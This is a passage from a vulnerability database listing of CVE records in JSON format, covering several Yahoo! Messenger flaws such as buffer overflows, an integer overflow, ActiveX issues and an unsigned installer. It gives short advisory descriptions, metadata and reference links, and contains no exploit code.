{
"tags": [
"x_refsource_MISC"
],
"url": "https://hackerone.com/reports/10767"
},
{
"name": "20150903 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/536390/100/0/threaded"
},
{
"name": "1033544",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1033544"
},
{
"name": "20150907 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2015/Sep/24"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-7216",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple stack-based buffer overflows in Yahoo! Messenger 11.5.0.228 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the (1) shortcut or (2) title keys in an emoticons.xml file."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/",
"refsource": "MISC",
"url": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/"
},
{
"name": "https://hackerone.com/reports/10767",
"refsource": "MISC",
"url": "https://hackerone.com/reports/10767"
},
{
"name": "20150903 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/536390/100/0/threaded"
},
{
"name": "1033544",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1033544"
},
{
"name": "20150907 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2015/Sep/24"
},
{
"name": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-7216",
"datePublished": "2015-09-11T20:00:00",
"dateReserved": "2014-09-28T00:00:00",
"dateUpdated": "2024-08-06T12:40:19.202Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2012-0268 (GCVE-0-2012-0268)
Vulnerability from cvelistv5 – Published: 2012-01-19 15:00 – Updated: 2024-09-17 01:46
VLAI?
Summary
Integer overflow in the CYImage::LoadJPG method in YImage.dll in Yahoo! Messenger before 11.5.0.155, when photo sharing is enabled, might allow remote attackers to execute arbitrary code via a crafted JPG image that triggers a heap-based buffer overflow.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T18:16:20.094Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "47041",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/47041"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Integer overflow in the CYImage::LoadJPG method in YImage.dll in Yahoo! Messenger before 11.5.0.155, when photo sharing is enabled, might allow remote attackers to execute arbitrary code via a crafted JPG image that triggers a heap-based buffer overflow."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2012-01-19T15:00:00Z",
"orgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"shortName": "flexera"
},
"references": [
{
"name": "47041",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/47041"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "PSIRT-CNA@flexerasoftware.com",
"ID": "CVE-2012-0268",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Integer overflow in the CYImage::LoadJPG method in YImage.dll in Yahoo! Messenger before 11.5.0.155, when photo sharing is enabled, might allow remote attackers to execute arbitrary code via a crafted JPG image that triggers a heap-based buffer overflow."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "47041",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/47041"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"assignerShortName": "flexera",
"cveId": "CVE-2012-0268",
"datePublished": "2012-01-19T15:00:00Z",
"dateReserved": "2011-12-30T00:00:00Z",
"dateUpdated": "2024-09-17T01:46:26.816Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2009-4171 (GCVE-0-2009-4171)
Vulnerability from cvelistv5 – Published: 2009-12-02 19:00 – Updated: 2024-08-07 06:54
VLAI?
Summary
An ActiveX control in YahooBridgeLib.dll for Yahoo! Messenger 9.0.0.2162, and possibly other 9.0 versions, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) by calling the RegisterMe method with a long argument.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T06:54:09.794Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20091112 Yahoo Messenger 9 ActiveX DoS (Null Pointer) Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/507818/100/0/threaded"
},
{
"name": "yahoo-messenger-activex-dos(54263)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54263"
},
{
"name": "37007",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/37007"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2009-11-12T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "An ActiveX control in YahooBridgeLib.dll for Yahoo! Messenger 9.0.0.2162, and possibly other 9.0 versions, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) by calling the RegisterMe method with a long argument."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-10T18:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20091112 Yahoo Messenger 9 ActiveX DoS (Null Pointer) Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/507818/100/0/threaded"
},
{
"name": "yahoo-messenger-activex-dos(54263)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54263"
},
{
"name": "37007",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/37007"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2009-4171",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An ActiveX control in YahooBridgeLib.dll for Yahoo! Messenger 9.0.0.2162, and possibly other 9.0 versions, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) by calling the RegisterMe method with a long argument."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20091112 Yahoo Messenger 9 ActiveX DoS (Null Pointer) Vulnerability",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/507818/100/0/threaded"
},
{
"name": "yahoo-messenger-activex-dos(54263)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54263"
},
{
"name": "37007",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/37007"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2009-4171",
"datePublished": "2009-12-02T19:00:00",
"dateReserved": "2009-12-02T00:00:00",
"dateUpdated": "2024-08-07T06:54:09.794Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2002-2361 (GCVE-0-2002-2361)
Vulnerability from cvelistv5 – Published: 2007-10-29 19:00 – Updated: 2024-09-17 01:20
VLAI?
Summary
The installer in Yahoo! Messenger 4.0, 5.0 and 5.5 does not verify package signatures which could allow remote attackers to install trojan programs via DNS spoofing.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T03:59:11.942Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "yahoo-installer-insecure-connection(9984)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "http://www.iss.net/security_center/static/9984.php"
},
{
"name": "20020827 Yahoo Messenger Install Secuirty",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://cert.uni-stuttgart.de/archive/bugtraq/2002/08/msg00384.html"
},
{
"name": "5579",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/5579"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The installer in Yahoo! Messenger 4.0, 5.0 and 5.5 does not verify package signatures which could allow remote attackers to install trojan programs via DNS spoofing."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2007-10-29T19:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "yahoo-installer-insecure-connection(9984)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "http://www.iss.net/security_center/static/9984.php"
},
{
"name": "20020827 Yahoo Messenger Install Secuirty",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://cert.uni-stuttgart.de/archive/bugtraq/2002/08/msg00384.html"
},
{
"name": "5579",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/5579"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-2361",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The installer in Yahoo! Messenger 4.0, 5.0 and 5.5 does not verify package signatures which could allow remote attackers to install trojan programs via DNS spoofing."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "yahoo-installer-insecure-connection(9984)",
"refsource": "XF",
"url": "http://www.iss.net/security_center/static/9984.php"
},
{
"name": "20020827 Yahoo Messenger Install Secuirty",
"refsource": "BUGTRAQ",
"url": "http://cert.uni-stuttgart.de/archive/bugtraq/2002/08/msg00384.html"
},
{
"name": "5579",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/5579"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-2361",
"datePublished": "2007-10-29T19:00:00Z",
"dateReserved": "2007-10-29T00:00:00Z",
"dateUpdated": "2024-09-17T01:20:44.264Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-5017 (GCVE-0-2007-5017)
Vulnerability from cvelistv5 – Published: 2007-09-20 21:00 – Updated: 2024-08-07 15:17
VLAI?
Summary
Absolute path traversal vulnerability in a certain ActiveX control in the CYFT object in ft60.dll in Yahoo! Messenger 8.1.0.421 allows remote attackers to force a download, and create or overwrite arbitrary files via a full pathname in the second argument to the GetFile method.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T15:17:28.168Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html"
},
{
"name": "4428",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/4428"
},
{
"name": "yahoo-messenger-ft60-code-execution(36694)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36694"
},
{
"name": "38296",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/38296"
},
{
"name": "25727",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/25727"
},
{
"name": "1018715",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1018715"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-09-19T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Absolute path traversal vulnerability in a certain ActiveX control in the CYFT object in ft60.dll in Yahoo! Messenger 8.1.0.421 allows remote attackers to force a download, and create or overwrite arbitrary files via a full pathname in the second argument to the GetFile method."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-09-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html"
},
{
"name": "4428",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/4428"
},
{
"name": "yahoo-messenger-ft60-code-execution(36694)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36694"
},
{
"name": "38296",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/38296"
},
{
"name": "25727",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/25727"
},
{
"name": "1018715",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1018715"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-5017",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Absolute path traversal vulnerability in a certain ActiveX control in the CYFT object in ft60.dll in Yahoo! Messenger 8.1.0.421 allows remote attackers to force a download, and create or overwrite arbitrary files via a full pathname in the second argument to the GetFile method."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html",
"refsource": "MISC",
"url": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html"
},
{
"name": "4428",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/4428"
},
{
"name": "yahoo-messenger-ft60-code-execution(36694)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36694"
},
{
"name": "38296",
"refsource": "OSVDB",
"url": "http://osvdb.org/38296"
},
{
"name": "25727",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/25727"
},
{
"name": "1018715",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1018715"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-5017",
"datePublished": "2007-09-20T21:00:00",
"dateReserved": "2007-09-20T00:00:00",
"dateUpdated": "2024-08-07T15:17:28.168Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-4635 (GCVE-0-2007-4635)
Vulnerability from cvelistv5 – Published: 2007-08-31 23:00 – Updated: 2024-09-16 16:32
VLAI?
Summary
Yahoo! Messenger 8.1.0.209 and 8.1.0.402 allows remote attackers to cause a denial of service (application crash) via certain file-transfer packets, possibly involving a buffer overflow, as demonstrated by ym8bug.exe. NOTE: this might be related to CVE-2007-4515. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T15:01:10.131Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "25484",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/25484"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Yahoo! Messenger 8.1.0.209 and 8.1.0.402 allows remote attackers to cause a denial of service (application crash) via certain file-transfer packets, possibly involving a buffer overflow, as demonstrated by ym8bug.exe. NOTE: this might be related to CVE-2007-4515. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2007-08-31T23:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "25484",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/25484"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-4635",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Yahoo! Messenger 8.1.0.209 and 8.1.0.402 allows remote attackers to cause a denial of service (application crash) via certain file-transfer packets, possibly involving a buffer overflow, as demonstrated by ym8bug.exe. NOTE: this might be related to CVE-2007-4515. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "25484",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/25484"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-4635",
"datePublished": "2007-08-31T23:00:00Z",
"dateReserved": "2007-08-31T00:00:00Z",
"dateUpdated": "2024-09-16T16:32:44.068Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-4515 (GCVE-0-2007-4515)
Vulnerability from cvelistv5 – Published: 2007-08-31 22:00 – Updated: 2024-08-07 15:01
VLAI?
Summary
Buffer overflow in a certain ActiveX control in YVerInfo.dll before 2007.8.27.1 in the Yahoo! services suite for Yahoo! Messenger before 8.1.0.419 allows remote attackers to execute arbitrary code via unspecified vectors involving arguments to the (1) fvCom and (2) info methods. NOTE: some of these details are obtained from third party information.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T15:01:09.859Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "37739",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/37739"
},
{
"name": "26579",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/26579"
},
{
"name": "yahoo-messenger-yverinfo-bo(36363)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36363"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://messenger.yahoo.com/security_update.php?id=082907"
},
{
"name": "20070830 Yahoo Messenger YVerInfo.dll ActiveX Multiple Remote Buffer Overflow Vulnerabilities",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE",
"x_transferred"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591"
},
{
"name": "3083",
"tags": [
"third-party-advisory",
"x_refsource_SREASON",
"x_transferred"
],
"url": "http://securityreason.com/securityalert/3083"
},
{
"name": "1018628",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://securitytracker.com/id?1018628"
},
{
"name": "25494",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/25494"
},
{
"name": "ADV-2007-3011",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/3011"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-08-29T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in a certain ActiveX control in YVerInfo.dll before 2007.8.27.1 in the Yahoo! services suite for Yahoo! Messenger before 8.1.0.419 allows remote attackers to execute arbitrary code via unspecified vectors involving arguments to the (1) fvCom and (2) info methods. NOTE: some of these details are obtained from third party information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "37739",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/37739"
},
{
"name": "26579",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/26579"
},
{
"name": "yahoo-messenger-yverinfo-bo(36363)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36363"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://messenger.yahoo.com/security_update.php?id=082907"
},
{
"name": "20070830 Yahoo Messenger YVerInfo.dll ActiveX Multiple Remote Buffer Overflow Vulnerabilities",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591"
},
{
"name": "3083",
"tags": [
"third-party-advisory",
"x_refsource_SREASON"
],
"url": "http://securityreason.com/securityalert/3083"
},
{
"name": "1018628",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://securitytracker.com/id?1018628"
},
{
"name": "25494",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/25494"
},
{
"name": "ADV-2007-3011",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/3011"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-4515",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in a certain ActiveX control in YVerInfo.dll before 2007.8.27.1 in the Yahoo! services suite for Yahoo! Messenger before 8.1.0.419 allows remote attackers to execute arbitrary code via unspecified vectors involving arguments to the (1) fvCom and (2) info methods. NOTE: some of these details are obtained from third party information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "37739",
"refsource": "OSVDB",
"url": "http://osvdb.org/37739"
},
{
"name": "26579",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/26579"
},
{
"name": "yahoo-messenger-yverinfo-bo(36363)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36363"
},
{
"name": "http://messenger.yahoo.com/security_update.php?id=082907",
"refsource": "CONFIRM",
"url": "http://messenger.yahoo.com/security_update.php?id=082907"
},
{
"name": "20070830 Yahoo Messenger YVerInfo.dll ActiveX Multiple Remote Buffer Overflow Vulnerabilities",
"refsource": "IDEFENSE",
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591"
},
{
"name": "3083",
"refsource": "SREASON",
"url": "http://securityreason.com/securityalert/3083"
},
{
"name": "1018628",
"refsource": "SECTRACK",
"url": "http://securitytracker.com/id?1018628"
},
{
"name": "25494",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/25494"
},
{
"name": "ADV-2007-3011",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/3011"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-4515",
"datePublished": "2007-08-31T22:00:00",
